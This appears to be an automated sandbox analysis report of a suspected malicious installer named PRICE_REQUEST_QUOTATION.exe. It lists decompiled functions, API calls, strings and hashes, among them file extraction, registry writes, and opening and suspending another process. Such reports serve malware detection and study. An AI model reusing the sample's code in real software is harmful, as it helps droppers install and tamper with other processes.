0x00405e9d
0x00405e9e
0x00405ea1
0x00405ea9
0x00405eab
0x00405eaf
0x00000000
0x00000000
0x00405eb5
0x00405eba
0x00000000
0x00000000
0x00000000
0x00405eba
0x00405ebf

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
CharNextA.USER32(?,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3

Strings

*?|<>/":, xrefs: 00405E71
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E2A, 00405E2F
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 00405E65

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2145876667
Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403efc
0x00403f90
0x00000000
0x00403f90
0x00403f0d
0x00403f11
0x00000000
0x00000000
0x00403f17
0x00403f20
0x00403f23
0x00403f23
0x00403f29
0x00403f2f
0x00403f2f
0x00403f3b
0x00403f41
0x00403f48
0x00403f4b
0x00403f4e
0x00403f50
0x00403f50
0x00403f58
0x00403f5e
0x00403f5e
0x00403f68
0x00403f6d
0x00403f70
0x00403f75
0x00403f78
0x00403f78
0x00403f88
0x00403f88
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403F07
GetSysColor.USER32(00000000), ref: 00403F23
SetTextColor.GDI32(?,00000000), ref: 00403F2F
SetBkMode.GDI32(?,?), ref: 00403F3B
GetSysColor.USER32(?), ref: 00403F4E
SetBkColor.GDI32(?,?), ref: 00403F5E
DeleteObject.GDI32(?), ref: 00403F78
CreateBrushIndirect.GDI32(?), ref: 00403F82

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x8800
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x004026af
0x004026b1
0x004026bd
0x004026c0
0x004026ca
0x004026ce
0x004026ce
0x004026d4
0x004026e1
0x004026e9
0x004026ec
0x004026f2
0x00402700
0x00402705
0x00402709
0x0040270c
0x00402715
0x00402721
0x00402725
0x00402728
0x00402732
0x00402751
0x00402739
0x0040273e
0x00402746
0x00402749
0x0040274e
0x0040274e
0x00402758
0x00402758
0x0040276a
0x00402771
0x00402783
0x00402783
0x00402789
0x00402789
0x00402794
0x00402795
0x00402799
0x0040279d
0x004027a3
0x004027a3
0x004027aa
0x00402197
0x004028c1
0x004028cd

APIs

GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
GlobalFree.KERNEL32 ref: 00402758
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
GlobalFree.KERNEL32 ref: 00402771
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404eb9
0x00404ec5
0x00404ec8
0x00404ece
0x00404eda
0x00404edd
0x00404ee0
0x00404ee6
0x00404ee6
0x00404eec
0x00404ef4
0x00404ef7
0x00404f14
0x00404f18
0x00404f21
0x00404f21
0x00404f2b
0x00404f34
0x00404f40
0x00404f47
0x00404f4b
0x00404f4e
0x00404f61
0x00404f6f
0x00404f6f
0x00404f73
0x00404f75
0x00404f78
0x00000000
0x00404f78
0x00404ef9
0x00404f01
0x00404f09
0x00404f0f
0x00000000
0x00404f0f
0x00404f09
0x00404ef7
0x00404f82

APIs

lstrlenA.KERNEL32(00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419301,7519EA30), ref: 00404F0F
SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
SendMessageA.USER32 ref: 00404F47
SendMessageA.USER32 ref: 00404F61
SendMessageA.USER32 ref: 00404F6F

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404790
0x0040479d
0x004047a3
0x004047e1
0x004047e1
0x004047f0
0x004047f7
0x00000000
0x004047f9
0x004047a5
0x004047b4
0x004047bc
0x004047bf
0x004047d1
0x004047d7
0x004047de
0x00000000
0x004047de
0x00000000

APIs

SendMessageA.USER32 ref: 0040479D
GetMessagePos.USER32 ref: 004047A5
ScreenToClient.USER32 ref: 004047BF
SendMessageA.USER32 ref: 004047D1
SendMessageA.USER32 ref: 004047F7

Strings

f, xrefs: 004047D3

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x8800
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b7b
0x00402b89
0x00402b8f
0x00402b8f
0x00402b9d
0x00402b9f
0x00402ba5
0x00402bac
0x00402bae
0x00402bae
0x00402bc4
0x00402bd4
0x00402be6
0x00402be6
0x00402bee

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
MulDiv.KERNEL32(00008800,00000064,?), ref: 00402BB4
wsprintfA.USER32 ref: 00402BC4
SetWindowTextA.USER32(?,?), ref: 00402BD4
SetDlgItemTextA.USER32 ref: 00402BE6

Strings

verifying installer: %d%%, xrefs: 00402BBE

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95

Uniqueness

Uniqueness Score: -1.00%

Function 73334190, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E73334190(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, int _a28, int _a32) {
				int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				void* _v48;
				int _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				int _t71;
				int _t73;
				int _t77;
				int _t80;
				int _t89;
				void* _t117;
				void* _t122;
				void* _t123;
				void* _t124;

				_v40 = E73331490(_a4);
				_v36 = 0x80004005;
				_t67 = _a24;
				0x73330000(_a20, _t67, _a28, _a32);
				_t68 = _a12;
				0x73330000(_t68, _a16, _t67);
				0x73330000("%p, %u, %s, %s, %p, %u, %p.\n", _a4, _a8, _t68);
				_push(_v40);
				_t70 = E73331120(_v40);
				_t122 = _t117 + 0x34;
				_v20 = _t70;
				if(_v20 == 0) {
					return 0x8000ffff;
				}
				__eflags = _a8 - 0xffffffff;
				if(__eflags != 0) {
					_t71 = E733313B0(__eflags, _v20, _a8);
					_t123 = _t122 + 8;
					_v12 = _t71;
				} else {
					_t89 = E733313F0(__eflags, _v20, _a12, _a16);
					_t123 = _t122 + 0xc;
					_v12 = _t89;
				}
				__eflags = _v12;
				if(_v12 != 0) {
					_t73 = GetFileVersionInfoSizeA(_v12 + 0x40,  &_v44);
					_v8 = _t73;
					__eflags = _v8;
					if(_v8 != 0) {
						0x73330000(_v8);
						_t124 = _t123 + 4;
						_v16 = _t73;
						__eflags = _v16;
						if(_v16 != 0) {
							_t77 = GetFileVersionInfoA(_v12 + 0x40, _v44, _v8, _v16);
							__eflags = _t77;
							if(_t77 == 0) {
								L27:
								0x73330000(_v16);
								return _v36;
							}
							_t80 = VerQueryValueA(_v16, _a20,  &_v48,  &_v8);
							__eflags = _t80;
							if(_t80 == 0) {
								goto L27;
							}
							__eflags = _a32;
							if(_a32 != 0) {
								 *_a32 = _v8;
							}
							__eflags = _a24;
							if(_a24 != 0) {
								__eflags = _a28;
								if(_a28 != 0) {
									__eflags = _v8 - _a28;
									if(_v8 >= _a28) {
										_v24 = _a28;
									} else {
										_v24 = _v8;
									}
									_v28 = _v24;
									__eflags = _v28;
									if(_v28 != 0) {
										0x73330000(_a24, _v48, _v28);
										_t124 = _t124 + 0xc;
									}
								}
							}
							__eflags = _a24;
							if(_a24 == 0) {
								L25:
								_v32 = 0;
								L26:
								_v36 = _v32;
								goto L27;
							}
							__eflags = _a28 - _v8;
							if(_a28 >= _v8) {
								goto L25;
							}
							_v32 = 1;
							goto L26;
						}
						return 0x8007000e;
					}
					return 0x80004005;
				} else {
					0x73330000("Was unable to locate module.\n");
					return 0x80070057;
				}
			}

0x733341a2
0x733341a5
0x733341b4
0x733341bc
0x733341c9
0x733341cd
0x733341e3
0x733341ee
0x733341ef
0x733341f4
0x733341f7
0x733341fe
0x00000000
0x73334200
0x7333420a
0x7333420e
0x73334231
0x73334236
0x73334239
0x73334210
0x7333421c
0x73334221
0x73334224
0x73334224
0x7333423c
0x73334240
0x73334264
0x73334269
0x7333426c
0x73334270
0x73334280
0x73334285
0x73334288
0x7333428b
0x7333428f
0x733342ae
0x733342b3
0x733342b5
0x73334348
0x7333434c
0x00000000
0x73334354
0x733342cb
0x733342d0
0x733342d2
0x00000000
0x00000000
0x733342d4
0x733342d8
0x733342e0
0x733342e0
0x733342e2
0x733342e6
0x733342e8
0x733342ec
0x733342f1
0x733342f4
0x73334301
0x733342f6
0x733342f9
0x733342f9
0x73334307
0x7333430a
0x7333430e
0x7333431c
0x73334321
0x73334321
0x7333430e
0x733342ec
0x73334324
0x73334328
0x7333433b
0x7333433b
0x73334342
0x73334345
0x00000000
0x73334345
0x7333432d
0x73334330
0x00000000
0x00000000
0x73334332
0x00000000
0x73334332
0x00000000
0x73334291
0x00000000
0x73334242
0x73334247
0x00000000
0x7333424f

Strings

Was unable to locate module., xrefs: 73334242
%p, %u, %s, %s, %p, %u, %p., xrefs: 733341DE

Memory Dump Source

Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %p, %u, %s, %s, %p, %u, %p.$Was unable to locate module.
API String ID: 0-1385147342
Opcode ID: 10f90b4c0eb131226d4c7097058fb3e8f8d266d607340fd6f70c2cafce75b6c0
Instruction ID: af0ee64afa0b4058e2e4fce81d84a192a5a10648845077a4a53635171796a17b
Opcode Fuzzy Hash: 10f90b4c0eb131226d4c7097058fb3e8f8d266d607340fd6f70c2cafce75b6c0
Instruction Fuzzy Hash: 0B514CB5D00219EBEB14CF94DD40BDE73B9AF49314F94C218E91AA7240D338EA51CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 73336A70, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E73336A70(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long* _t49;

				_v28 = E733314A0(_a4);
				0x73330000("%p, %#x, %u.\n", _a4, _a8, _a12);
				_push(_v28);
				_v8 = E73331120(_a4);
				if(_v8 != 0) {
					if((_v8[1] & 0x00000001) == 0) {
						0x73330000("Unsupported attach flags %#x.\n", _v8[1]);
						return 0x80004001;
					}
					if((_v8[1] & 0x00000004) != 0) {
						_v16 = 0;
					} else {
						_v16 = 1;
					}
					_v20 = _v16;
					_v12 = 0x1030;
					if(_v20 != 0) {
						_v12 = _v12 | 0x00000800;
					}
					_v8[2] = OpenProcess(_v12, 0,  *_v8);
					if(_v8[2] != 0) {
						if(_v20 != 0) {
							_t49 = _v8;
							0x73330000( *((intOrPtr*)(_t49 + 8)));
							_v24 = _t49;
							if(_v24 != 0) {
								0x73330000("Failed to suspend a process, status %#x.\n", _v24);
							}
						}
						return 0;
					} else {
						0x73330000("Failed to get process handle for pid %#x.\n",  *_v8);
						return 0x8000ffff;
					}
				}
				return 0x8000ffff;
			}

0x73336a82
0x73336a96
0x73336aa1
0x73336aaa
0x73336ab1
0x73336ac6
0x73336b82
0x00000000
0x73336b8a
0x73336ad5
0x73336ae0
0x73336ad7
0x73336ad7
0x73336ad7
0x73336aea
0x73336aed
0x73336af8
0x73336b03
0x73336b03
0x73336b1b
0x73336b25
0x73336b45
0x73336b47
0x73336b4e
0x73336b56
0x73336b5d
0x73336b68
0x73336b6d
0x73336b5d
0x00000000
0x73336b27
0x73336b32
0x00000000
0x73336b3a
0x73336b25
0x00000000

APIs

OpenProcess.KERNEL32(00001030,00000000,00000000), ref: 73336B12

Strings

Failed to get process handle for pid %#x., xrefs: 73336B2D
%p, %#x, %u., xrefs: 73336A91
Unsupported attach flags %#x., xrefs: 73336B7D
Failed to suspend a process, status %#x., xrefs: 73336B63

Memory Dump Source

Source File: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess
String ID: %p, %#x, %u.$Failed to get process handle for pid %#x.$Failed to suspend a process, status %#x.$Unsupported attach flags %#x.
API String ID: 3743895883-1030270061
Opcode ID: 6b7e44c5cde5d0342a32cdd8c9df0291d5192a0d3433722442b7f424b0556212
Instruction ID: 93220b627eb32708499ad54443a3abfd4d5e1b93b6d3d8a1d4b5b6c7a2173f50
Opcode Fuzzy Hash: 6b7e44c5cde5d0342a32cdd8c9df0291d5192a0d3433722442b7f424b0556212
Instruction Fuzzy Hash: B1315EB5E00108EFDB10DF94C981BAEB7B9AB46304F55C158E8066B341D739DE41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}

0x00402337
0x0040233c
0x00402346
0x00402350
0x00402353
0x0040235d
0x0040236d
0x00402374
0x0040237c
0x0040238a
0x0040238e
0x00402399
0x00402399
0x0040239d
0x004023a1
0x004023a7
0x004023ac
0x004023ac
0x004023b0
0x004023bc
0x004023bc
0x004023d5
0x004023d7
0x004023d7
0x004023da
